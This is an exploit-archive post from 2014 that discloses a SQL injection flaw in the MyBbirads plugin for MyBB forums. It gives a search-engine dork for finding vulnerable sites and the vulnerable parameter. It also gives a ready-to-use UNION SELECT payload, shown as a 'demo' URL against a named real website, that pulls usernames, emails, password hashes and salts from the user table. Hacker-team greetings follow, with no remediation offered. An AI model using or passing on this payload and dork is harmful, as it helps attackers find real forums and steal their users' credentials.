Mybb MyBbirads Plugin SQL Injection

2014-01-28 12:16:12
Posted by: irist.ir

##############
#
# Exploit Title : Mybb MyBbirads Plugin SQL Injection
#
# Exploit Author : Emperor-Team
#
# Home : www.community.mybbiran.com
#
# Security Risk : Medium
#
# Dork : inurl:\"mybbirads.php?id=-
#
# Tested on: Linux & Windows
#
# CMS:MyBb
#
##############
#
# Location: Target/path/mybbirads.php?id=[SQLi]
#
# Demo: http://partalk.ir/mybbirads.php?id=1,2) /*!union select*/ 1,concat_ws(0x7c,username,email,password,salt),3,4,5,6,7,8,9,10 from mybb�_user -- -
#
##############
#
# Mr.PERSIA
#
# Mail:[email protected]
#
# | IRANIAN HACKERS ARE THE BEST |
#
##############
#
# | Mr.PERSIA | MR.F@RDIN | Explo!ter | Hidden Dagger | yazdanx7 |
#
# | N3RD | Greendel | H0553|N7 | Mr.RaYaN | Generall.Eshgh | Mr.M@jid |
#
# | MoHaMaD-VaKeR | _exe_ | tm_sd68 | Tir3x | H0$$E!N | Terrible_King |
#
# | Trojan | Mr.Ali Se7en | Kamran Helish | Ramin shahkar | Ali_Emperor_HaCkeR | anti.cris | N3TWORK | And all members
#
##############

Fixes

No fixes

In order to submit a new fix you need to be registered.